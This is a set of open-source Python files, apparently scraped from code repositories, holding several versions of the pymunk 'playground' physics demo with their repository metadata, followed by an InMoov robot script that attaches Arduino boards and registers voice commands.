            text = font.render(line, True, pygame.Color("black"))
            self.screen.blit(text, (5, y))
            y += 10
    def create_ball(self, point, mass=1.0, radius=15.0):
        # Build a dynamic circle body+shape, add it to the space, return the shape.
        moment = pm.moment_for_circle(mass, 0.0, radius)
        ball_body = pm.Body(mass, moment)
        ball_body.position = Vec2d(*point)
        ball_shape = pm.Circle(ball_body, radius)
        ball_shape.friction = 1.5
        ball_shape.collision_type = COLLTYPE_DEFAULT
        self.space.add(ball_body, ball_shape)
        return ball_shape
    def create_box(self, pos, size=10, mass=5.0):
        # Axis-aligned square of half-width ``size``, centered on the body.
        box_points = [(-size, -size), (-size, size), (size, size), (size, -size)]
        return self.create_poly(box_points, mass=mass, pos=pos)
    def create_poly(self, points, mass=5.0, pos=(0, 0)):
        # Build a dynamic convex polygon body+shape, add it, return the shape.
        moment = pm.moment_for_poly(mass, points)
        # moment = 1000
        body = pm.Body(mass, moment)
        body.position = Vec2d(*pos)
        shape = pm.Poly(body, points)
        shape.friction = 0.5
        shape.collision_type = COLLTYPE_DEFAULT
        self.space.add(body, shape)
        return shape
    def create_wall_segments(self, points):
        """Create a number of wall segments connecting the points"""
        if len(points) < 2:
            return []
        points = [Vec2d(*p) for p in points]
        for i in range(len(points) - 1):
            v1 = Vec2d(points[i].x, points[i].y)
            v2 = Vec2d(points[i + 1].x, points[i + 1].y)
            # Walls are static bodies: they never move under simulation.
            wall_body = pm.Body(body_type=pm.Body.STATIC)
            wall_shape = pm.Segment(wall_body, v1, v2, 0.0)
            wall_shape.friction = 1.0
            wall_shape.collision_type = COLLTYPE_DEFAULT
            self.space.add(wall_body, wall_shape)
            self.walls.append(wall_shape)
    def run(self):
        # Main loop: iterate until the user quits (ESC / window close).
        while self.running:
            self.loop()
    def draw_ball(self, ball):
        # Outline circle at the ball's world position (pymunk -> screen coords).
        body = ball.body
        v = body.position + ball.offset.cpvrotate(body.rotation_vector)
        p = self.flipyv(v)
        r = ball.radius
        pygame.draw.circle(self.screen, pygame.Color("blue"), p, int(r), 2)
    def draw_wall(self, wall):
        # Line between the segment's two endpoints in screen coordinates.
        body = wall.body
        pv1 = self.flipyv(body.position + wall.a.cpvrotate(body.rotation_vector))
        pv2 = self.flipyv(body.position + wall.b.cpvrotate(body.rotation_vector))
        pygame.draw.lines(self.screen, pygame.Color("lightgray"), False, [pv1, pv2])
    def draw_poly(self, poly):
        # Closed outline of the polygon; color encodes winding after the
        # y-flip (green = clockwise on screen, red otherwise).
        body = poly.body
        ps = [p.rotated(body.angle) + body.position for p in poly.get_vertices()]
        ps.append(ps[0])
        ps = list(map(self.flipyv, ps))
        if u.is_clockwise(ps):
            color = pygame.Color("green")
        else:
            color = pygame.Color("red")
        pygame.draw.lines(self.screen, color, False, ps)
    def draw(self):
        ### Clear the screen
        self.screen.fill(pygame.Color("white"))
        ### Display some text
        self.draw_helptext()
        ### Draw balls
        for ball in self.balls:
            self.draw_ball(ball)
        ### Draw walls
        for wall in self.walls:
            self.draw_wall(wall)
        ### Draw polys
        for poly in self.polys:
            self.draw_poly(poly)
        ### Draw Uncompleted walls
        if len(self.wall_points) > 1:
            ps = [self.flipyv(Vec2d(*p)) for p in self.wall_points]
            pygame.draw.lines(self.screen, pygame.Color("gray"), False, ps, 2)
        ### Uncompleted poly
        if len(self.poly_points) > 1:
            ps = [self.flipyv(Vec2d(*p)) for p in self.poly_points]
            pygame.draw.lines(self.screen, pygame.Color("red"), False, ps, 2)
        ### Mouse Contact
        if self.mouse_contact is not None:
            p = self.flipyv(self.mouse_contact)
            pygame.draw.circle(self.screen, pygame.Color("red"), p, 3)
        ### All done, lets flip the display
        pygame.display.flip()
    def loop(self):
        # One frame: handle input events, step physics, draw, prune
        # off-screen objects, and tick the clock.
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                self.running = False
            elif event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE:
                self.running = False
            elif event.type == pygame.KEYDOWN and event.key == pygame.K_p:
                # Screenshot of the current frame.
                pygame.image.save(self.screen, "playground.png")
            elif event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:  # LMB
                if pygame.key.get_mods() & pygame.KMOD_SHIFT:
                    p = self.flipyv(Vec2d(*event.pos))
                    self.polys.append(self.create_box(pos=p))
                else:
                    # t = -10000
                    p = self.flipyv(Vec2d(*event.pos))
                    self.balls.append(self.create_ball(p))
            elif event.type == pygame.MOUSEBUTTONDOWN and event.button == 3:  # RMB
                if pygame.key.get_mods() & pygame.KMOD_SHIFT:
                    pass
                elif pygame.key.get_mods() & pygame.KMOD_CTRL:
                    # Collect a vertex for the wall under construction.
                    p = self.flipyv(Vec2d(*event.pos))
                    self.wall_points.append(p)
                elif self.shape_to_remove is not None:
                    # Delete the shape currently under the mouse cursor.
                    self.balls = list(
                        filter(lambda a: a != self.shape_to_remove, self.balls)
                    )
                    self.walls = list(
                        filter(lambda a: a != self.shape_to_remove, self.walls)
                    )
                    self.polys = list(
                        filter(lambda a: a != self.shape_to_remove, self.polys)
                    )
                    self.space.remove(self.shape_to_remove.body, self.shape_to_remove)
            elif event.type == pygame.KEYUP and event.key in (
                pygame.K_RCTRL,
                pygame.K_LCTRL,
            ):
                ### Create Wall
                self.create_wall_segments(self.wall_points)
                self.wall_points = []
            elif event.type == pygame.KEYUP and event.key in (
                pygame.K_RSHIFT,
                pygame.K_LSHIFT,
            ):
                ### Create Polygon
                # Simplify the drawn outline, take its convex hull, and
                # re-center the vertices around the hull's centroid.
                if len(self.poly_points) > 0:
                    self.poly_points = u.reduce_poly(self.poly_points, tolerance=5)
                if len(self.poly_points) > 2:
                    self.poly_points = u.convex_hull(self.poly_points)
                    if not u.is_clockwise(self.poly_points):
                        self.poly_points.reverse()
                    center = u.calc_center(self.poly_points)
                    self.poly_points = u.poly_vectors_around_center(self.poly_points)
                    self.polys.append(self.create_poly(self.poly_points, pos=center))
                self.poly_points = []
            elif event.type == pygame.KEYDOWN and event.key == pygame.K_SPACE:
                self.run_physics = not self.run_physics
            elif event.type == pygame.KEYDOWN and event.key == pygame.K_k:
                # Spawn a grid of boxes around the mouse position.
                for x in range(-100, 100, 25):
                    for y in range(-100, 100, 25):
                        p = pygame.mouse.get_pos()
                        p = Vec2d(*self.flipyv(Vec2d(*p))) + (x, y)
                        self.polys.append(self.create_box(pos=p))
            elif event.type == pygame.KEYDOWN and event.key == pygame.K_b:
                self.polys.append(self.create_box(self.flipyv(Vec2d(*pygame.mouse.get_pos())), size=10, mass=1)) if False else None
            elif event.type == pygame.KEYDOWN and event.key == pygame.K_f:
                # Fire a ball from (100, 500) toward the mouse cursor.
                bp = Vec2d(100, 500)
                p = self.flipyv(Vec2d(*pygame.mouse.get_pos())) - bp
                ball = self.create_ball(bp)
                p = p.normalized()
                ball.body.apply_impulse_at_local_point(p * 1000, (0, 0))
                self.balls.append(ball)
            elif event.type == pygame.KEYDOWN and event.key == pygame.K_g:
                # Rotate gravity by 45 degrees.
                g = self.space.gravity
                self.space.gravity = g.rotated_degrees(45)
        mpos = pygame.mouse.get_pos()
        if pygame.key.get_mods() & pygame.KMOD_SHIFT and pygame.mouse.get_pressed()[2]:
            # While Shift+RMB is held, record freehand polygon vertices.
            p = self.flipyv(Vec2d(*mpos))
            self.poly_points.append(p)
        # Remember the shape (if any) under the cursor for removal/marker.
        hit = self.space.point_query_nearest(
            self.flipyv(Vec2d(*mpos)), 0, pm.ShapeFilter()
        )
        if hit != None:
            self.shape_to_remove = hit.shape
        else:
            self.shape_to_remove = None
        ### Update physics
        if self.run_physics:
            x = 1
            dt = 1.0 / 60.0 / x
            for x in range(x):
                self.space.step(dt)
                for ball in self.balls:
                    # ball.body.reset_forces()
                    pass
                for poly in self.polys:
                    # poly.body.reset_forces()
                    pass
        ### Draw stuff
        self.draw()
        ### Check for objects outside of the screen, we can remove those
        # Balls
        xs = []
        for ball in self.balls:
            if (
                ball.body.position.x < -1000
                or ball.body.position.x > 1000
                or ball.body.position.y < -1000
                or ball.body.position.y > 1000
            ):
                xs.append(ball)
        for ball in xs:
            self.space.remove(ball, ball.body)
            self.balls.remove(ball)
        # Polys
        xs = []
        for poly in self.polys:
            if (
                poly.body.position.x < -1000
                or poly.body.position.x > 1000
                or poly.body.position.y < -1000
                or poly.body.position.y > 1000
            ):
                xs.append(poly)
        for poly in xs:
            self.space.remove(poly, poly.body)
            self.polys.remove(poly)
        ### Tick clock and update fps in title
        self.clock.tick(50)
        pygame.display.set_caption("fps: " + str(self.clock.get_fps()))
def main():
    """Create the playground demo and enter its event loop."""
    PhysicsDemo().run()
if __name__ == "__main__":
    # Flip to a truthy value to run under cProfile instead of directly.
    doprof = 0
    if doprof:
        import cProfile
        import pstats

        cProfile.run("main()", "profile.prof")
        stats = pstats.Stats("profile.prof")
        stats.strip_dirs()
        stats.sort_stats("cumulative", "time", "calls")
        stats.print_stats(30)
    else:
        main()
| {
"repo_name": "viblo/pymunk",
"path": "examples/playground.py",
"copies": "1",
"size": "12446",
"license": "mit",
"hash": -3578279751607315000,
"line_mean": 33.9606741573,
"line_max": 116,
"alpha_frac": 0.5207295517,
"autogenerated": false,
"ratio": 3.6127721335268506,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.463350168522685,
"avg_score": null,
"num_lines": null
} |
"""A basic playground. Most interesting function is draw a shape, basically
move the mouse as you want and pymunk will approximate a Poly shape from the
drawing.
"""
__version__ = "$Id:$"
__docformat__ = "reStructuredText"
import pygame
from pygame.locals import *
from pygame.color import *
import pymunk as pm
from pymunk import Vec2d
import pymunk.util as u
#TODO: Clean up code
# Collision type identifiers assigned to shapes when added to the space.
COLLTYPE_DEFAULT = 0  # used for balls, boxes, polygons and walls
COLLTYPE_MOUSE = 1  # reserved for mouse interaction (not referenced in this chunk)
class PhysicsDemo:
def flipyv(self, v):
return int(v.x), int(-v.y+self.h)
def __init__(self):
self.running = True
### Init pygame and create screen
pygame.init()
self.w, self.h = 600,600
self.screen = pygame.display.set_mode((self.w, self.h))
self.clock = pygame.time.Clock()
### Init pymunk and create space
self.space = pm.Space()
self.space.gravity = (0.0, -900.0)
### Walls
self.walls = []
self.create_wall_segments( map(Vec2d, [(100, 50), (500, 50)]) )
## Balls
#balls = [createBall(space, (100,300))]
self.balls = []
### Polys
self.polys = []
h = 10
for y in range(1,h):
#for x in range(1, y):
x = 0
s = 10
p = Vec2d(300,40) + Vec2d(0, y*s*2)
self.polys.append(self.create_box(p, size=s, mass = 1))
self.run_physics = True
### Wall under construction
self.wall_points = []
### Poly under construction
self.poly_points = []
self.shape_to_remove = None
self.mouse_contact = None
def draw_helptext(self):
font = pygame.font.Font(None, 16)
text = ["LMB: Create ball"
,"LMB + Shift: Create box"
,"RMB on object: Remove object"
,"RMB(hold) + Shift: Create polygon, release to finish (we be converted to a convex hull of the points)"
,"RMB + Ctrl: Create wall, release to finish"
,"Space: Stop physics simulation"
,"k: Spawn a bunch of blocks"
,"f: Fire a ball from the top left corner"
]
y = 5
for line in text:
text = font.render(line, 1,THECOLORS["black"])
self.screen.blit(text, (5,y))
y += 10
def create_ball(self, point, mass=1.0, radius=15.0):
moment = pm.moment_for_circle(mass, radius, 0.0, Vec2d(0,0))
ball_body = pm.Body(mass, moment)
ball_body.position = Vec2d(point)
ball_shape = pm.Circle(ball_body, radius, Vec2d(0,0))
ball_shape.friction = 1.5
ball_shape.collision_type = COLLTYPE_DEFAULT
self.space.add(ball_body, ball_shape)
return ball_shape
def create_box(self, pos, size = 10, mass = 5.0):
box_points = map(Vec2d, [(-size, -size), (-size, size), (size,size), (size, -size)])
return self.create_poly(box_points, mass = mass, pos = pos)
def create_poly(self, points, mass = 5.0, pos = (0,0)):
moment = pm.moment_for_poly(mass,points, Vec2d(0,0))
#moment = 1000
body = pm.Body(mass, moment)
body.position = Vec2d(pos)
print body.position
shape = pm.Poly(body, points, Vec2d(0,0))
shape.friction = 0.5
shape.collision_type = COLLTYPE_DEFAULT
self.space.add(body, shape)
return shape
def create_wall_segments(self, points):
"""Create a number of wall segments connecting the points"""
if len(points) < 2:
return []
points = map(Vec2d, points)
for i in range(len(points)-1):
v1 = Vec2d(points[i].x, points[i].y)
v2 = Vec2d(points[i+1].x, points[i+1].y)
wall_body = pm.Body()
wall_shape = pm.Segment(wall_body, v1, v2, .0)
wall_shape.friction = 1.0
wall_shape.collision_type = COLLTYPE_DEFAULT
self.space.add(wall_shape)
self.walls.append(wall_shape)
def run(self):
while self.running:
self.loop()
def draw_ball(self, ball):
body = ball.body
v = body.position + ball.offset.cpvrotate(body.rotation_vector)
p = self.flipyv(v)
r = ball.radius
pygame.draw.circle(self.screen, THECOLORS["blue"], p, int(r), 2)
def draw_wall(self, wall):
body = wall.body
pv1 = self.flipyv(body.position + wall.a.cpvrotate(body.rotation_vector))
pv2 = self.flipyv(body.position + wall.b.cpvrotate(body.rotation_vector))
pygame.draw.lines(self.screen, THECOLORS["lightgray"], False, [pv1,pv2])
    def draw_poly(self, poly):
        # Render a Poly shape's outline, closing it by repeating the first
        # vertex. Green means the screen-space winding is clockwise,
        # red flags a counter-clockwise (suspect) winding.
        body = poly.body
        ps = poly.get_vertices()
        ps.append(ps[0])
        ps = map(self.flipyv, ps)
        if u.is_clockwise(ps):
            color = THECOLORS["green"]
        else:
            color = THECOLORS["red"]
        pygame.draw.lines(self.screen, color, False, ps)
    def draw(self):
        """Redraw the whole frame: help text, all shapes, in-progress
        sketches, the mouse-contact marker, then flip the display."""
        ### Clear the screen
        self.screen.fill(THECOLORS["white"])
        ### Display some text
        self.draw_helptext()
        ### Draw balls
        for ball in self.balls:
            self.draw_ball(ball)
        ### Draw walls
        for wall in self.walls:
            self.draw_wall(wall)
        ### Draw polys
        for poly in self.polys:
            self.draw_poly(poly)
        ### Draw Uncompleted walls
        if len(self.wall_points) > 1:
            ps = [self.flipyv(Vec2d(p)) for p in self.wall_points]
            pygame.draw.lines(self.screen, THECOLORS["gray"], False, ps, 2)
        ### Uncompleted poly
        if len(self.poly_points) > 1:
            ps = [self.flipyv(Vec2d(p)) for p in self.poly_points]
            pygame.draw.lines(self.screen, THECOLORS["red"], False, ps, 2)
        ### Mouse Contact
        if self.mouse_contact is not None:
            p = self.flipyv(self.mouse_contact)
            pygame.draw.circle(self.screen, THECOLORS["red"], p, 3)
        ### All done, lets flip the display
        pygame.display.flip()
def loop(self):
for event in pygame.event.get():
if event.type == QUIT:
self.running = False
elif event.type == KEYDOWN and event.key == K_ESCAPE:
self.running = False
elif event.type == KEYDOWN and event.key == K_p:
pygame.image.save(self.screen, "playground.png")
elif event.type == MOUSEBUTTONDOWN and event.button == 1: # LMB
if pygame.key.get_mods() & KMOD_SHIFT:
p = self.flipyv(Vec2d(event.pos))
self.polys.append(self.create_box(pos = p))
else:
#t = -10000
p = self.flipyv(Vec2d(event.pos))
self.balls.append(self.create_ball(p))
print p
elif event.type == MOUSEBUTTONDOWN and event.button == 3: #RMB
if pygame.key.get_mods() & KMOD_SHIFT:
pass
elif pygame.key.get_mods() & KMOD_CTRL:
p = self.flipyv(Vec2d(event.pos))
self.wall_points.append(p)
elif self.shape_to_remove is not None:
print self.shape_to_remove
self.balls = filter(lambda a: a != self.shape_to_remove, self.balls)
self.walls = filter(lambda a: a != self.shape_to_remove, self.walls)
self.polys = filter(lambda a: a != self.shape_to_remove, self.polys)
self.space.remove(self.shape_to_remove.body, self.shape_to_remove)
elif event.type == KEYUP and event.key in (K_RCTRL, K_LCTRL):
### Create Wall
self.create_wall_segments(self.wall_points)
self.wall_points = []
elif event.type == KEYUP and event.key in (K_RSHIFT, K_LSHIFT):
### Create Polygon
if len(self.poly_points) > 0:
self.poly_points = u.reduce_poly(self.poly_points, tolerance=5)
if len(self.poly_points) > 2:
self.poly_points = u.convex_hull(self.poly_points)
if not u.is_clockwise(self.poly_points):
self.poly_points.reverse()
center = u.calc_center(self.poly_points)
self.poly_points = u.poly_vectors_around_center(self.poly_points)
self.polys.append(self.create_poly(self.poly_points, pos=center))
self.poly_points = []
elif event.type == KEYDOWN and event.key == K_SPACE:
self.run_physics = not self.run_physics
elif event.type == KEYDOWN and event.key == K_k:
for x in range (-100,100,25):
for y in range(-100,100,25):
p = pygame.mouse.get_pos()
p = self.flipyv(Vec2d(p)) + (x,y)
self.polys.append(self.create_box(pos=p))
elif event.type == KEYDOWN and event.key == K_b:
p = flipyv(Vec2d(pygame.mouse.get_pos()))
self.polys.append(self.create_box(p, size=10, mass = 1))
elif event.type == KEYDOWN and event.key == K_f:
bp = Vec2d(100,500)
p = self.flipyv(Vec2d(pygame.mouse.get_pos())) -bp
ball = self.create_ball(bp)
p = p.normalized()
ball.body.apply_impulse(p*1000, (0,0))
self.balls.append(ball)
elif event.type == KEYDOWN and event.key == K_g:
g = self.space.gravity
g.rotate(45)
self.space.gravity = g
mpos = pygame.mouse.get_pos()
if pygame.key.get_mods() & KMOD_SHIFT and pygame.mouse.get_pressed()[2]:
p = self.flipyv(Vec2d(mpos))
self.poly_points.append(p)
self.shape_to_remove = self.space.point_query_first( self.flipyv(Vec2d(mpos)) )
### Update physics
if self.run_physics:
x = 1
dt = 1.0/60.0/x
for x in range(x):
self.space.step(dt)
for ball in self.balls:
#ball.body.reset_forces()
pass
for poly in self.polys:
#poly.body.reset_forces()
pass
### Draw stuff
self.draw()
### Check for objects outside of the screen, we can remove those
# Balls
xs = []
for ball in self.balls:
if ball.body.position.x < -1000 or ball.body.position.x > 1000 \
or ball.body.position.y < -1000 or ball.body.position.y > 1000:
xs.append(ball)
for ball in xs:
self.space.remove(ball, ball.body)
self.balls.remove(ball)
# Polys
xs = []
for poly in self.polys:
if poly.body.position.x < -1000 or poly.body.position.x > 1000 \
or poly.body.position.y < -1000 or poly.body.position.y > 1000:
xs.append(poly)
for poly in xs:
self.space.remove(poly, poly.body)
self.polys.remove(poly)
### Tick clock and update fps in title
self.clock.tick(50)
pygame.display.set_caption("fps: " + str(self.clock.get_fps()))
def main():
    """Entry point: build the demo and run it until the user quits."""
    PhysicsDemo().run()
if __name__ == '__main__':
doprof = 0
if not doprof:
main()
else:
import cProfile, pstats
prof = cProfile.run("main()", "profile.prof")
stats = pstats.Stats("profile.prof")
stats.strip_dirs()
stats.sort_stats('cumulative', 'time', 'calls')
stats.print_stats(30)
| {
"repo_name": "imanolarrieta/angrybirds",
"path": "pymunk-4.0.0/examples/playground.py",
"copies": "5",
"size": "12298",
"license": "mit",
"hash": 6784726544429606000,
"line_mean": 35.7104477612,
"line_max": 120,
"alpha_frac": 0.5090258579,
"autogenerated": false,
"ratio": 3.6449318316538233,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.6653957689553823,
"avg_score": null,
"num_lines": null
} |
"""A basic playground. Most interesting function is draw a shape, basically
move the mouse as you want and pymunk will approximate a Poly shape from the
drawing.
"""
__version__ = "$Id:$"
__docformat__ = "reStructuredText"
import pygame
from pygame.locals import *
from pygame.color import *
import pymunk as pm
from pymunk import Vec2d
import pymunk.util as u
#TODO: Clean up code
COLLTYPE_DEFAULT = 0
COLLTYPE_MOUSE = 1
class PhysicsDemo:
def flipyv(self, v):
return int(v.x), int(-v.y+self.h)
def __init__(self):
self.running = True
### Init pygame and create screen
pygame.init()
self.w, self.h = 600,600
self.screen = pygame.display.set_mode((self.w, self.h))
self.clock = pygame.time.Clock()
### Init pymunk and create space
self.space = pm.Space()
self.space.gravity = (0.0, -900.0)
### Walls
self.walls = []
self.create_wall_segments( map(Vec2d, [(100, 50), (500, 50)]) )
## Balls
#balls = [createBall(space, (100,300))]
self.balls = []
### Polys
self.polys = []
h = 10
for y in range(1,h):
#for x in range(1, y):
x = 0
s = 10
p = Vec2d(300,40) + Vec2d(0, y*s*2)
self.polys.append(self.create_box(p, size=s, mass = 1))
self.run_physics = True
### Wall under construction
self.wall_points = []
### Poly under construction
self.poly_points = []
self.shape_to_remove = None
self.mouse_contact = None
def draw_helptext(self):
font = pygame.font.Font(None, 16)
text = ["LMB: Create ball"
,"LMB + Shift: Create box"
,"RMB on object: Remove object"
,"RMB(hold) + Shift: Create polygon, release to finish (we be converted to a convex hull of the points)"
,"RMB + Ctrl: Create wall, release to finish"
,"Space: Stop physics simulation"
,"k: Spawn a bunch of blocks"
,"f: Fire a ball from the top left corner"
]
y = 5
for line in text:
text = font.render(line, 1,THECOLORS["black"])
self.screen.blit(text, (5,y))
y += 10
def create_ball(self, point, mass=1.0, radius=15.0):
moment = pm.moment_for_circle(mass, radius, 0.0, Vec2d(0,0))
ball_body = pm.Body(mass, moment)
ball_body.position = Vec2d(point)
ball_shape = pm.Circle(ball_body, radius, Vec2d(0,0))
ball_shape.friction = 1.5
ball_shape.collision_type = COLLTYPE_DEFAULT
self.space.add(ball_body, ball_shape)
return ball_shape
def create_box(self, pos, size = 10, mass = 5.0):
box_points = map(Vec2d, [(-size, -size), (-size, size), (size,size), (size, -size)])
return self.create_poly(box_points, mass = mass, pos = pos)
def create_poly(self, points, mass = 5.0, pos = (0,0)):
moment = pm.moment_for_poly(mass,points, Vec2d(0,0))
#moment = 1000
body = pm.Body(mass, moment)
body.position = Vec2d(pos)
print body.position
shape = pm.Poly(body, points, Vec2d(0,0))
shape.friction = 0.5
shape.collision_type = COLLTYPE_DEFAULT
self.space.add(body, shape)
return shape
def create_wall_segments(self, points):
"""Create a number of wall segments connecting the points"""
if len(points) < 2:
return []
points = map(Vec2d, points)
for i in range(len(points)-1):
v1 = Vec2d(points[i].x, points[i].y)
v2 = Vec2d(points[i+1].x, points[i+1].y)
wall_body = pm.Body()
wall_shape = pm.Segment(wall_body, v1, v2, .0)
wall_shape.friction = 1.0
wall_shape.collision_type = COLLTYPE_DEFAULT
self.space.add(wall_shape)
self.walls.append(wall_shape)
def run(self):
while self.running:
self.loop()
def draw_ball(self, ball):
body = ball.body
v = body.position + ball.offset.cpvrotate(body.rotation_vector)
p = self.flipyv(v)
r = ball.radius
pygame.draw.circle(self.screen, THECOLORS["blue"], p, r, 2)
def draw_wall(self, wall):
body = wall.body
pv1 = self.flipyv(body.position + wall.a.cpvrotate(body.rotation_vector))
pv2 = self.flipyv(body.position + wall.b.cpvrotate(body.rotation_vector))
pygame.draw.lines(self.screen, THECOLORS["lightgray"], False, [pv1,pv2])
def draw_poly(self, poly):
body = poly.body
ps = poly.get_points()
ps.append(ps[0])
ps = map(self.flipyv, ps)
if u.is_clockwise(ps):
color = THECOLORS["green"]
else:
color = THECOLORS["red"]
pygame.draw.lines(self.screen, color, False, ps)
def draw(self):
### Clear the screen
self.screen.fill(THECOLORS["white"])
### Display some text
self.draw_helptext()
### Draw balls
for ball in self.balls:
self.draw_ball(ball)
### Draw walls
for wall in self.walls:
self.draw_wall(wall)
### Draw polys
for poly in self.polys:
self.draw_poly(poly)
### Draw Uncompleted walls
if len(self.wall_points) > 1:
ps = [self.flipyv(Vec2d(p)) for p in self.wall_points]
pygame.draw.lines(self.screen, THECOLORS["gray"], False, ps, 2)
### Uncompleted poly
if len(self.poly_points) > 1:
ps = [self.flipyv(Vec2d(p)) for p in self.poly_points]
pygame.draw.lines(self.screen, THECOLORS["red"], False, ps, 2)
### Mouse Contact
if self.mouse_contact is not None:
p = self.flipyv(self.mouse_contact)
pygame.draw.circle(self.screen, THECOLORS["red"], p, 3)
### All done, lets flip the display
pygame.display.flip()
def loop(self):
for event in pygame.event.get():
if event.type == QUIT:
self.running = False
elif event.type == KEYDOWN and event.key == K_ESCAPE:
self.running = False
elif event.type == KEYDOWN and event.key == K_p:
pygame.image.save(self.screen, "playground.png")
elif event.type == MOUSEBUTTONDOWN and event.button == 1: # LMB
if pygame.key.get_mods() & KMOD_SHIFT:
p = self.flipyv(Vec2d(event.pos))
self.polys.append(self.create_box(pos = p))
else:
#t = -10000
p = self.flipyv(Vec2d(event.pos))
self.balls.append(self.create_ball(p))
print p
elif event.type == MOUSEBUTTONDOWN and event.button == 3: #RMB
if pygame.key.get_mods() & KMOD_SHIFT:
pass
elif pygame.key.get_mods() & KMOD_CTRL:
p = self.flipyv(Vec2d(event.pos))
self.wall_points.append(p)
elif self.shape_to_remove is not None:
print self.shape_to_remove
self.balls = filter(lambda a: a != self.shape_to_remove, self.balls)
self.walls = filter(lambda a: a != self.shape_to_remove, self.walls)
self.polys = filter(lambda a: a != self.shape_to_remove, self.polys)
self.space.remove(self.shape_to_remove.body, self.shape_to_remove)
elif event.type == KEYUP and event.key in (K_RCTRL, K_LCTRL):
### Create Wall
self.create_wall_segments(self.wall_points)
self.wall_points = []
elif event.type == KEYUP and event.key in (K_RSHIFT, K_LSHIFT):
### Create Polygon
if len(self.poly_points) > 0:
self.poly_points = u.reduce_poly(self.poly_points, tolerance=5)
if len(self.poly_points) > 2:
self.poly_points = u.convex_hull(self.poly_points)
if not u.is_clockwise(self.poly_points):
self.poly_points.reverse()
center = u.calc_center(self.poly_points)
self.poly_points = u.poly_vectors_around_center(self.poly_points)
self.polys.append(self.create_poly(self.poly_points, pos=center))
self.poly_points = []
elif event.type == KEYDOWN and event.key == K_SPACE:
self.run_physics = not self.run_physics
elif event.type == KEYDOWN and event.key == K_k:
for x in range (-100,100,25):
for y in range(-100,100,25):
p = pygame.mouse.get_pos()
p = self.flipyv(Vec2d(p)) + (x,y)
self.polys.append(self.create_box(pos=p))
elif event.type == KEYDOWN and event.key == K_b:
p = flipyv(Vec2d(pygame.mouse.get_pos()))
self.polys.append(self.create_box(p, size=10, mass = 1))
elif event.type == KEYDOWN and event.key == K_f:
bp = Vec2d(100,500)
p = self.flipyv(Vec2d(pygame.mouse.get_pos())) -bp
ball = self.create_ball(bp)
p = p.normalized()
ball.body.apply_impulse(p*1000, (0,0))
self.balls.append(ball)
elif event.type == KEYDOWN and event.key == K_g:
g = self.space.gravity
g.rotate(45)
self.space.gravity = g
mpos = pygame.mouse.get_pos()
if pygame.key.get_mods() & KMOD_SHIFT and pygame.mouse.get_pressed()[2]:
p = self.flipyv(Vec2d(mpos))
self.poly_points.append(p)
self.shape_to_remove = self.space.point_query_first( self.flipyv(Vec2d(mpos)) )
### Update physics
if self.run_physics:
x = 1
dt = 1.0/60.0/x
for x in range(x):
self.space.step(dt)
for ball in self.balls:
#ball.body.reset_forces()
pass
for poly in self.polys:
#poly.body.reset_forces()
pass
### Draw stuff
self.draw()
### Check for objects outside of the screen, we can remove those
# Balls
xs = []
for ball in self.balls:
if ball.body.position.x < -1000 or ball.body.position.x > 1000 \
or ball.body.position.y < -1000 or ball.body.position.y > 1000:
xs.append(ball)
for ball in xs:
self.space.remove(ball, ball.body)
self.balls.remove(ball)
# Polys
xs = []
for poly in self.polys:
if poly.body.position.x < -1000 or poly.body.position.x > 1000 \
or poly.body.position.y < -1000 or poly.body.position.y > 1000:
xs.append(poly)
for poly in xs:
self.space.remove(poly, poly.body)
self.polys.remove(poly)
### Tick clock and update fps in title
self.clock.tick(50)
pygame.display.set_caption("fps: " + str(self.clock.get_fps()))
def main():
    """Entry point: build the demo and run it until the user quits."""
    PhysicsDemo().run()
if __name__ == '__main__':
    # Set doprof to a truthy value to profile a run instead of running
    # the demo directly.
    doprof = 0
    if not doprof:
        main()
    else:
        import cProfile, pstats
        prof = cProfile.run("main()", "profile.prof")
        stats = pstats.Stats("profile.prof")
        stats.strip_dirs()
        stats.sort_stats('cumulative', 'time', 'calls')
        stats.print_stats(30)
| {
"repo_name": "cfobel/python___pymunk",
"path": "examples/playground.py",
"copies": "1",
"size": "12622",
"license": "mit",
"hash": 8670299500612371000,
"line_mean": 35.6895522388,
"line_max": 120,
"alpha_frac": 0.4955633022,
"autogenerated": false,
"ratio": 3.72220583898555,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.471776914118555,
"avg_score": null,
"num_lines": null
} |
# a basic script for starting the InMoov service
# and attaching the right hand
# an Arduino is required, additionally a computer
# with a microphone and speakers is needed for voice
# control and speech synthesis
# ADD SECOND STAGE CONFIRMATION
# instead of saying: you said... it would say: did you say...? and I would confirm with yes or give the voice command again
# face tracking in InMoov ... activated by voice ...
inMoov = Runtime.createAndStart("inMoov", "InMoov")
# Serial ports for the two Arduino boards and the camera device index.
rightSerialPort = "COM8"
leftSerialPort = "COM7"
cameraIndex = 1
# attach an arduinos to InMoov
# possible board types include uno atmega168 atmega328p atmega2560 atmega1280 atmega32u4
# the MRLComm.ino sketch must be loaded into the Arduino for MyRobotLab control
inMoov.attachArduino("right","uno",rightSerialPort)
inMoov.attachHand("right")
inMoov.attachArm("right")
inMoov.attachArduino("left","atmega1280", leftSerialPort)
inMoov.attachHand("left")
inMoov.attachArm("left")
inMoov.attachHead("left")
# system check
inMoov.systemCheck()
inMoov.rest()
inMoov.setCameraIndex(cameraIndex)
# new process for verbal commands
# Each addCommand maps a spoken phrase to a (service, method, args...) call.
ear = inMoov.getEar()
ear.addCommand("rest", inMoov.getName(), "rest")
ear.addCommand("open hand", inMoov.getName(), "handOpen", "both")
ear.addCommand("close hand", inMoov.getName(), "handClose", "both")
ear.addCommand("camera on", inMoov.getName(), "cameraOn")
# ear.addCommand("off camera", inMoov.getName(), "cameraOff") - needs fixing
ear.addCommand("capture gesture", inMoov.getName(), "captureGesture")
ear.addCommand("track", inMoov.getName(), "track")
ear.addCommand("freeze track", inMoov.getName(), "clearTrackingPoints")
ear.addCommand("hello", inMoov.getName(), "hello")
ear.addCommand("giving", inMoov.getName(), "giving")
ear.addCommand("fighter", inMoov.getName(), "fighter")
ear.addCommand("fist hips", inMoov.getName(), "fistHips")
ear.addCommand("look at this", inMoov.getName(), "lookAtThis")
ear.addCommand("victory", inMoov.getName(), "victory")
ear.addCommand("arms up", inMoov.getName(), "armsUp")
ear.addCommand("arms front", inMoov.getName(), "armsFront")
